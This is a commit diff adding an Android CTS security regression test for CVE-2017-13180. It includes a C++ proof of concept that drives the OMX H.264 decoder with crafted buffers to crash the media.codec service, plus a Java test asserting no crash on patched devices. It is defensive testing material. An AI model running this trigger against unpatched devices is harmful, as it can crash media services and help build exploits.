[RESTRICT AUTOMERGE] CTS test for Android Security b/66969349
Bug: 66969349
Bug: 72401027
Test: Ran the new testcase on android-9.0.0_r39 to test with/without patch
Change-Id: Ib19d8df21819e8f09d7472554901cd3d8f8a6e05
(cherry picked from commit d1d610a47c252aff2a7b663c3eaf11cd79ea4ebe)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 9141716..1b9867d 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -173,6 +173,7 @@
<!--__________________-->
<!-- Bulletin 2018-01 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-13180->/data/local/tmp/CVE-2017-13180" />
<option name="push" value="CVE-2017-0817->/data/local/tmp/CVE-2017-0817" />
<option name="push" value="CVE-2018-9527->/data/local/tmp/CVE-2018-9527" />
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.mk
new file mode 100644
index 0000000..311b082
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.mk
@@ -0,0 +1,44 @@
+# Copyright (C) 2020 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2017-13180
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_SRC_FILES_32 := ../includes/omxUtils.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_C_INCLUDES_32 := frameworks/native/include/media/openmax
+LOCAL_C_INCLUDES_32 += frameworks/native/include/media/hardware/
+LOCAL_SHARED_LIBRARIES_32 := liblog
+LOCAL_SHARED_LIBRARIES_32 += libbinder
+LOCAL_SHARED_LIBRARIES_32 += libstagefright
+LOCAL_SHARED_LIBRARIES_32 += libstagefright_foundation
+LOCAL_SHARED_LIBRARIES_32 += libutils
+LOCAL_SHARED_LIBRARIES_32 += libmedia_omx
+LOCAL_SHARED_LIBRARIES_32 += libcutils
+LOCAL_SHARED_LIBRARIES_32 += libhidlbase
+LOCAL_SHARED_LIBRARIES_32 += libhidlmemory
+LOCAL_SHARED_LIBRARIES_32 += android.hidl.allocator@1.0
+LOCAL_SHARED_LIBRARIES_32 += android.hardware.media.omx@1.0
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/poc.cpp
new file mode 100644
index 0000000..d163023
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/poc.cpp
@@ -0,0 +1,113 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License"); you may not
+ * use this file except in compliance with the License. You may obtain a copy of
+ * the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+ * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
+ * License for the specific language governing permissions and limitations under
+ * the License.
+ */
+
+#include "../includes/common.h"
+#include <stdlib.h>
+
+// This PoC is only for 32-bit builds
+#if _32_BIT
+#include "../includes/omxUtils.h"
+#define TIMESTAMP_US 0x00010001
+
+extern bool mUseTreble;
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+
+int allocateHidlPortBuffers(OMX_U32 portIndex, Vector<Buffer> *buffers) {
+ buffers->clear();
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ int err = omxUtilsGetParameter(portIndex, &def);
+ omxExitOnError(err);
+
+ for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+ Buffer buffer;
+ buffer.mFlags = 0;
+ bool success;
+ auto transStatus = mAllocator->allocate(def.nBufferSize,
+ [&success, &buffer](
+ bool s,
+ hidl_memory const& m) {
+ success = s;
+ buffer.mHidlMemory = m;
+ });
+ omxExitOnError(!transStatus.isOk());
+ omxExitOnError(!success);
+ omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID);
+ buffers->push(buffer);
+ }
+ return OK;
+}
+#endif /* _32_BIT */
+
+int main() {
+
+// This PoC is only for 32-bit builds
+#if _32_BIT
+ int i;
+ Vector < Buffer > inputBuffers;
+ Vector < Buffer > outputBuffers;
+ status_t err = omxUtilsInit((char*) "OMX.google.h264.decoder");
+
+ omxExitOnError(err);
+
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, &def);
+
+ int inMemorySize = def.nBufferCountActual * def.nBufferSize;
+ int inBufferCount = def.nBufferCountActual;
+ sp < MemoryDealer > dealerIn = new MemoryDealer(inMemorySize);
+ IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCount];
+
+ omxUtilsGetParameter(OMX_UTILS_OP_PORT, &def);
+
+ int outMemorySize = def.nBufferCountActual * def.nBufferSize;
+ int outBufferCount = def.nBufferCountActual;
+ sp < MemoryDealer > dealerOut = new MemoryDealer(outMemorySize);
+ IOMX::buffer_id *outBufferId = new IOMX::buffer_id[outBufferCount];
+
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers);
+ for (i = 0; i < inBufferCount; ++i) {
+ inBufferId[i] = inputBuffers[i].mID;
+ }
+
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers);
+ for (i = 0; i < outBufferCount; ++i) {
+ outBufferId[i] = outputBuffers[i].mID;
+ }
+
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+
+ OMX_U32 flags = OMX_BUFFERFLAG_ENDOFFRAME;
+ int64_t timeUs = TIMESTAMP_US;
+ omxUtilsEmptyBuffer(inBufferId[0], OMXBuffer::sPreset, flags, timeUs, -1);
+ omxUtilsFillBuffer(outBufferId[0], OMXBuffer::sPreset, -1);
+
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+
+ for (i = 0; i < inBufferCount; ++i) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mID);
+ }
+
+ for (i = 0; i < outBufferCount; ++i) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mID);
+ }
+
+ omxUtilsFreeNode();
+#endif /* _32_BIT */
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 4311e0a..6a4f81c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -214,6 +214,18 @@
}
/**
+ * b/66969349
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2018-01")
+ @Test
+ public void testPocCVE_2017_13180() throws Exception {
+ String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13180", null, getDevice(),
+ processPatternStrings);
+ }
+
+ /**
* b/111210196
* Vulnerability Behaviour: EXIT_VULNERABLE (113)
*/
